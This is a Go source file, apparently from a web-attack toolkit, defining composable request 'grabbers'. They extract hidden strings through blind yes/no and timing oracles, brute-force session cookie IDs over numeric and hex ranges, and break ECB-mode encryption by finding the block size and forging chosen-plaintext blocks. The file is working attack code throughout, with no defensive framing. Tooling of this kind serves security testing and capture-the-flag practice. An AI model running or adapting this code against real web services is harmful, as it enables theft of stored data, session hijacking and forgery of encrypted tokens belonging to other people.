1 package main 2 3 import ( 4 "encoding/hex" 5 "net/http" 6 "strconv" 7 "strings" 8 "time" 9 ) 10 11 type BruteForceString struct { 12 SetDataGrabber 13 Field, Prefix, Suffix, First, Wildcard string 14 } 15 16 func (s BruteForceString) Grab(r http.Request) string { 17 const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890" 18 var result, knownChars string 19 20 for _, c := range chars { 21 s.SetDataGrabber.SetKey(s.Field, Text{s.Prefix + s.Wildcard + string(c) + s.Wildcard + s.Suffix}) 22 if s.SetDataGrabber.Grab(r) == "1" { 23 knownChars += string(c) 24 } 25 } 26 Loop: 27 for { 28 for _, c := range knownChars { 29 s.SetDataGrabber.SetKey(s.Field, Text{s.Prefix + s.First + result + string(c) + s.Wildcard + s.Suffix}) 30 if s.SetDataGrabber.Grab(r) == "1" { 31 result += string(c) 32 continue Loop 33 } 34 } 35 return result 36 } 37 } 38 39 type NotContain struct { 40 Grabber 41 NotMatch string 42 } 43 44 func (n NotContain) Grab(r http.Request) string { 45 if !strings.Contains(n.Grabber.Grab(r), n.NotMatch) { 46 return "1" 47 } 48 return "0" 49 } 50 51 type Contains struct { 52 Grabber 53 Match string 54 } 55 56 func (c Contains) Grab(r http.Request) string { 57 if strings.Contains(c.Grabber.Grab(r), c.Match) { 58 return "1" 59 } 60 return "0" 61 } 62 63 type TakesTime struct { 64 Grabber 65 time.Duration 66 } 67 68 func (t TakesTime) Grab(r http.Request) string { 69 start := time.Now() 70 t.Grabber.Grab(r) 71 if time.Now().Sub(start) > t.Duration { 72 return "1" 73 } 74 return "0" 75 } 76 77 type BruteForceRange struct { 78 SetDataGrabber 79 Range 80 Field, Prefix, Suffix string 81 } 82 83 func (b BruteForceRange) Grab(r http.Request) string { 84 for b.Range.Next() { 85 idStr := b.Range.ID() 86 b.SetDataGrabber.SetKey(b.Field, Text{b.Prefix + idStr + b.Suffix}) 87 if b.SetDataGrabber.Grab(r) == "1" { 88 return idStr 89 } 90 } 91 panic("no cookie found") 92 } 93 94 type Range interface { 95 Next() bool 96 ID() string 97 } 98 99 type NumRange struct { 100 Start, End int 101 } 102 103 func (r *NumRange) Next() bool { 104 r.Start++ 105 return r.Start <= r.End 106 } 107 108 func (r *NumRange) ID() string { 109 return strconv.Itoa(r.Start) 110 } 111 112 type RangeList []Range 113 114 func (r *RangeList) Next() bool { 115 if len(*r) > 0 { 116 if !(*r)[0].Next() { 117 *r = (*r)[1:] 118 return len(*r) > 0 119 } 120 return true 121 } 122 return false 123 } 124 125 func (r *RangeList) ID() string { 126 return (*r)[0].ID() 127 } 128 129 type RangeSuffix struct { 130 Range 131 Suffix string 132 } 133 134 func (r RangeSuffix) ID() string { 135 return r.Range.ID() + r.Suffix 136 } 137 138 type RangeHex struct { 139 Range 140 } 141 142 func (r RangeHex) ID() string { 143 return hex.EncodeToString([]byte(r.Range.ID())) 144 } 145 146 type ECBBreaker struct { 147 Encrypter interface { 148 Grabber 149 SetKey(string, Grabber) 150 } 151 EncrypterField string 152 PlainText string 153 } 154 155 func (e ECBBreaker) Grab(r http.Request) string { 156 e.Encrypter.SetKey(e.EncrypterField, Text{""}) 157 initialLength := len(e.Encrypter.Grab(r)) 158 i := 1 159 firstChange := -1 160 secondChange := -1 161 for { 162 e.Encrypter.SetKey(e.EncrypterField, Text{strings.Repeat("A", i)}) 163 l := len(e.Encrypter.Grab(r)) 164 if l != initialLength { 165 if firstChange == -1 { 166 initialLength = l 167 firstChange = l 168 } else { 169 secondChange = l 170 break 171 } 172 } 173 i++ 174 } 175 176 blockSize := secondChange - firstChange 177 178 var offset, blockStart int 179 str := strings.Repeat("B", blockSize-1) + strings.Repeat("A", blockSize*2) 180 181 Loop: 182 for i := 0; i < 16; i++ { 183 e.Encrypter.SetKey(e.EncrypterField, Text{str[15-i:]}) 184 str := e.Encrypter.Grab(r) 185 last := "" 186 for j := 0; j < len(str); j += blockSize { 187 this := str[j : j+blockSize] 188 if this == last { 189 blockStart = (j / 16) - 1 190 offset = i 191 break Loop 192 } 193 last = this 194 } 195 } 196 197 e.Encrypter.SetKey(e.EncrypterField, Text{strings.Repeat("B", offset) + e.PlainText}) 198 enc := e.Encrypter.Grab(r) 199 200 return enc[blockStart*blockSize:] 201 }